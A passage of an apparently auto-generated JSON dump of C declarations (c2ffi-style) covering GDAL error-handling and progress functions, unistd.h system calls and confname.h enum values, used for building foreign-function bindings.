false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "CPLGetErrorCounter", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:148:29", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": "GUInt32" } }, { "tag": "function", "name": "CPLGetErrorHandlerUserData", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:149:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "CPLErrorSetState", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:150:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "eErrClass", "type": { "tag": "CPLErr" } }, { "tag": "parameter", "name": "err_no", "type": { "tag": "CPLErrorNum" } }, { "tag": "parameter", "name": "pszMsg", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLCleanupErrorMutex", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:152:14", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "typedef", "ns": 0, "name": "CPLErrorHandler", "location": "/usr/include/gdal/cpl_error.h:156:28", "type": { "tag": ":function-pointer" } }, { "tag": "function", "name": "CPLLoggingErrorHandler", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:158:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "CPLErr" } }, { "tag": "parameter", "name": "", "type": { "tag": "CPLErrorNum" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLDefaultErrorHandler", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:159:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "CPLErr" } }, { "tag": "parameter", "name": "", "type": { "tag": "CPLErrorNum" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLQuietErrorHandler", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:160:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "CPLErr" } }, { "tag": "parameter", "name": "", "type": { "tag": "CPLErrorNum" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLTurnFailureIntoWarning", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:161:6", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "bOn", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLSetErrorHandler", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:163:37", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "CPLErrorHandler" } }], "return-type": { "tag": "CPLErrorHandler" } }, { "tag": "function", "name": "CPLSetErrorHandlerEx", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:164:37", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "CPLErrorHandler" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "CPLErrorHandler" } }, { "tag": "function", "name": "CPLPushErrorHandler", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:165:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "CPLErrorHandler" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLPushErrorHandlerEx", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:166:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "CPLErrorHandler" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLSetCurrentErrorHandlerCatchDebug", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:167:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "bCatchDebug", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLPopErrorHandler", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:168:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "CPLDebug", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:173:26", "variadic": true, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_CPLAssert", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:177:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "typedef", "ns": 0, "name": "GDALProgressFunc", "location": "/usr/include/gdal/cpl_progress.h:37:27", "type": { "tag": ":function-pointer" } }, { "tag": "function", "name": "GDALDummyProgress", "ns": 0, "location": "/usr/include/gdal/cpl_progress.h:39:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALTermProgress", "ns": 0, "location": "/usr/include/gdal/cpl_progress.h:40:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALScaledProgress", "ns": 0, "location": "/usr/include/gdal/cpl_progress.h:41:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALCreateScaledProgress", "ns": 0, "location": "/usr/include/gdal/cpl_progress.h:42:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALProgressFunc" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "GDALDestroyScaledProgress", "ns": 0, "location": "/usr/include/gdal/cpl_progress.h:44:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "typedef", "ns": 0, "name": "useconds_t", "location": "/usr/include/unistd.h:255:22", "type": { "tag": "__useconds_t" } }, { "tag": "typedef", "ns": 0, "name": "intptr_t", "location": "/usr/include/unistd.h:267:20", "type": { "tag": "__intptr_t" } }, { "tag": "typedef", "ns": 0, "name": "socklen_t", "location": "/usr/include/unistd.h:274:21", "type": { "tag": "__socklen_t" } }, { "tag": "function", "name": "access", "ns": 0, "location": "/usr/include/unistd.h:287:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__name", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__type", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "faccessat", "ns": 0, "location": "/usr/include/unistd.h:304:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__file", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__type", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__flag", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "lseek", "ns": 0, "location": "/usr/include/unistd.h:334:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__offset", "type": { "tag": "__off_t" } }, { "tag": "parameter", "name": "__whence", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__off_t" } }, { "tag": "function", "name": "close", "ns": 0, "location": "/usr/include/unistd.h:353:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "read", "ns": 0, "location": "/usr/include/unistd.h:360:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__nbytes", "type": { "tag": "size_t" } }], "return-type": { "tag": "ssize_t" } }, { "tag": "function", "name": "write", "ns": 0, "location": "/usr/include/unistd.h:366:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }], "return-type": { "tag": "ssize_t" } }, { "tag": "function", "name": "pread", "ns": 0, "location": "/usr/include/unistd.h:376:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__nbytes", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__offset", "type": { "tag": "__off_t" } }], "return-type": { "tag": "ssize_t" } }, { "tag": "function", "name": "pwrite", "ns": 0, "location": "/usr/include/unistd.h:384:16", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__n", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__offset", "type": { "tag": "__off_t" } }], "return-type": { "tag": "ssize_t" } }, { "tag": "function", "name": "pipe", "ns": 0, "location": "/usr/include/unistd.h:417:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__pipedes", "type": { "tag": ":array", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 }, "size": 2 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "alarm", "ns": 0, "location": "/usr/include/unistd.h:432:21", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__seconds", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "sleep", "ns": 0, "location": "/usr/include/unistd.h:444:21", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__seconds", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "ualarm", "ns": 0, "location": "/usr/include/unistd.h:452:21", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": "__useconds_t" } }, { "tag": "parameter", "name": "__interval", "type": { "tag": "__useconds_t" } }], "return-type": { "tag": "__useconds_t" } }, { "tag": "function", "name": "usleep", "ns": 0, "location": "/usr/include/unistd.h:460:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__useconds", "type": { "tag": "__useconds_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "pause", "ns": 0, "location": "/usr/include/unistd.h:469:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "chown", "ns": 0, "location": "/usr/include/unistd.h:473:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__file", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__owner", "type": { "tag": "__uid_t" } }, { "tag": "parameter", "name": "__group", "type": { "tag": "__gid_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fchown", "ns": 0, "location": "/usr/include/unistd.h:478:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__owner", "type": { "tag": "__uid_t" } }, { "tag": "parameter", "name": "__group", "type": { "tag": "__gid_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "lchown", "ns": 0, "location": "/usr/include/unistd.h:483:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__file", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__owner", "type": { "tag": "__uid_t" } }, { "tag": "parameter", "name": "__group", "type": { "tag": "__gid_t" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fchownat", "ns": 0, "location": "/usr/include/unistd.h:491:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__file", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__owner", "type": { "tag": "__uid_t" } }, { "tag": "parameter", "name": "__group", "type": { "tag": "__gid_t" } }, { "tag": "parameter", "name": "__flag", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "chdir", "ns": 0, "location": "/usr/include/unistd.h:497:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fchdir", "ns": 0, "location": "/usr/include/unistd.h:501:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "getcwd", "ns": 0, "location": "/usr/include/unistd.h:511:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__size", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "getwd", "ns": 0, "location": "/usr/include/unistd.h:525:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "dup", "ns": 0, "location": "/usr/include/unistd.h:531:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "dup2", "ns": 0, "location": "/usr/include/unistd.h:534:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__fd2", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "extern", "name": "__environ", "ns": 0, "location": "/usr/include/unistd.h:543:15", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "function", "name": "execve", "ns": 0, "location": "/usr/include/unistd.h:551:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__argv", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__envp", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "fexecve", "ns": 0, "location": "/usr/include/unistd.h:557:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__fd", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__argv", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "__envp", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "execv", "ns": 0, "location": "/usr/include/unistd.h:563:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__argv", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "execle", "ns": 0, "location": "/usr/include/unistd.h:568:12", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__arg", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "execl", "ns": 0, "location": "/usr/include/unistd.h:573:12", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__path", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__arg", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "execvp", "ns": 0, "location": "/usr/include/unistd.h:578:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__file", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__argv", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "execlp", "ns": 0, "location": "/usr/include/unistd.h:584:12", "variadic": true, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__file", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__arg", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "nice", "ns": 0, "location": "/usr/include/unistd.h:598:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__inc", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_exit", "ns": 0, "location": "/usr/include/unistd.h:603:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__status", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "enum", "ns": 0, "name": "", "id": 52, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:24:1", "fields": [{ "tag": "field", "name": "_PC_LINK_MAX", "value": 0 }, { "tag": "field", "name": "_PC_MAX_CANON", "value": 1 }, { "tag": "field", "name": "_PC_MAX_INPUT", "value": 2 }, { "tag": "field", "name": "_PC_NAME_MAX", "value": 3 }, { "tag": "field", "name": "_PC_PATH_MAX", "value": 4 }, { "tag": "field", "name": "_PC_PIPE_BUF", "value": 5 }, { "tag": "field", "name": "_PC_CHOWN_RESTRICTED", "value": 6 }, { "tag": "field", "name": "_PC_NO_TRUNC", "value": 7 }, { "tag": "field", "name": "_PC_VDISABLE", "value": 8 }, { "tag": "field", "name": "_PC_SYNC_IO", "value": 9 }, { "tag": "field", "name": "_PC_ASYNC_IO", "value": 10 }, { "tag": "field", "name": "_PC_PRIO_IO", "value": 11 }, { "tag": "field", "name": "_PC_SOCK_MAXBUF", "value": 12 }, { "tag": "field", "name": "_PC_FILESIZEBITS", "value": 13 }, { "tag": "field", "name": "_PC_REC_INCR_XFER_SIZE", "value": 14 }, { "tag": "field", "name": "_PC_REC_MAX_XFER_SIZE", "value": 15 }, { "tag": "field", "name": "_PC_REC_MIN_XFER_SIZE", "value": 16 }, { "tag": "field", "name": "_PC_REC_XFER_ALIGN", "value": 17 }, { "tag": "field", "name": "_PC_ALLOC_SIZE_MIN", "value": 18 }, { "tag": "field", "name": "_PC_SYMLINK_MAX", "value": 19 }, { "tag": "field", "name": "_PC_2_SYMLINKS", "value": 20 }] }, { "tag": "enum", "ns": 0, "name": "", "id": 53, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:71:1", "fields": [{ "tag": "field", "name": "_SC_ARG_MAX", "value": 0 }, { "tag": "field", "name": "_SC_CHILD_MAX", "value": 1 }, { "tag": "field", "name": "_SC_CLK_TCK", "value": 2 }, { "tag": "field", "name": "_SC_NGROUPS_MAX", "value": 3 }, { "tag": "field", "name": "_SC_OPEN_MAX", "value": 4 }, { "tag": "field", "name": "_SC_STREAM_MAX", "value": 5 }, { "tag": "field", "name": "_SC_TZNAME_MAX", "value": 6 }, { "tag": "field", "name": "_SC_JOB_CONTROL", "value": 7 }, { "tag": "field", "name": "_SC_SAVED_IDS", "value": 8 }, { "tag": "field", "name": "_SC_REALTIME_SIGNALS", "value": 9 }, { "tag": "field", "name": "_SC_PRIORITY_SCHEDULING", "value": 10 }, { "tag": "field", "name": "_SC_TIMERS", "value": 11 }, { "tag": "field", "name": "_SC_ASYNCHRONOUS_IO", "value": 12 }, { "tag": "field", "name": "_SC_PRIORITIZED_IO", "value": 13 }, { "tag": "field", "name": "_SC_SYNCHRONIZED_IO", "value": 14 }, { "tag": "field", "name": "_SC_FSYNC", "value": 15 }, { "tag": "field", "name": "_SC_MAPPED_FILES", "value": 16 }, { "tag": "field", "name": "_SC_MEMLOCK", "value": 17 }, { "tag": "field", "name": "_SC_MEMLOCK_RANGE", "value": 18 }, { "tag": "field", "name": "_SC_MEMORY_PROTECTION", "value": 19 }, { "tag": "field", "name": "_SC_MESSAGE_PASSING", "value": 20 }, { "tag": "field", "name": "_SC_SEMAPHORES", "value": 21 }, { "tag": "field", "name": "_SC_SHARED_MEMORY_OBJECTS", "value": 22 }, { "tag": "field", "name": "_SC_AIO_LISTIO_MAX", "value": 23 }, { "tag": "field", "name": "_SC_AIO_MAX", "value": 24 }, { "tag": "field", "name": "_SC_AIO_PRIO_DELTA_MAX", "value": 25 }, { "tag": "field", "name": "_SC_DELAYTIMER_MAX", "value": 26 }, { "tag": "field", "name": "_SC_MQ_OPEN_MAX", "value": 27 }, { "tag": "field", "name": "_SC_MQ_PRIO_MAX", "value": 28 }, { "tag": "field", "name": "_SC_VERSION", "value": 29 }, { "tag": "field", "name": "_SC_PAGESIZE", "value": 30 }, { "tag": "field", "name": "_SC_RTSIG_MAX", "value": 31 }, { "tag": "field", "name": "_SC_SEM_NSEMS_MAX", "value": 32 }, { "tag": "field", "name": "_SC_SEM_VALUE_MAX", "value": 33 }, { "tag": "field", "name": "_SC_SIGQUEUE_MAX", "value": 34 }, { "tag": "field", "name": "_SC_TIMER_MAX", "value": 35 }, { "tag": "field", "name": "_SC_BC_BASE_MAX", "value": 36 }, { "tag": "field", "name": "_SC_BC_DIM_MAX", "value": 37 }, { "tag": "field", "name": "_SC_BC_SCALE_MAX", "value": 38 }, { "tag": "field", "name": "_SC_BC_STRING_MAX", "value": 39 }, { "tag": "field", "name": "_SC_COLL_WEIGHTS_MAX", "value": 40 }, { "tag": "field", "name": "_SC_EQUIV_CLASS_MAX", "value": 41 }, { "tag": "field", "name": "_SC_EXPR_NEST_MAX", "value": 42 }, { "tag": "field", "name": "_SC_LINE_MAX", "value": 43 }, { "tag": "field", "name": "_SC_RE_DUP_MAX", "value": 44 }, { "tag": "field", "name": "_SC_CHARCLASS_NAME_MAX", "value": 45 }, { "tag": "field", "name": "_SC_2_VERSION", "value": 46 }, { "tag": "field", "name": "_SC_2_C_BIND", "value": 47 }, { "tag": "field", "name": "_SC_2_C_DEV", "value": 48 }, { "tag": "field", "name": "_SC_2_FORT_DEV", "value": 49 }, { "tag": "field", "name": "_SC_2_FORT_RUN", "value": 50 }, { "tag": "field", "name": "_SC_2_SW_DEV", "value": 51 }, { "tag": "field", "name": "_SC_2_LOCALEDEF", "value": 52 }, { "tag": "field", "name": "_SC_PII", "value": 53 }, { "tag": "field", "name": "_SC_PII_XTI", "value": 54 }, { "tag": "field", "name": "_SC_PII_SOCKET", "value": 55 }, { "tag": "field", "name": "_SC_PII_INTERNET", "value": 56 }, { "tag": "field", "name": "_SC_PII_OSI", "value": 57 }, { "tag": "field", "name": "_SC_POLL", "value": 58 }, { "tag": 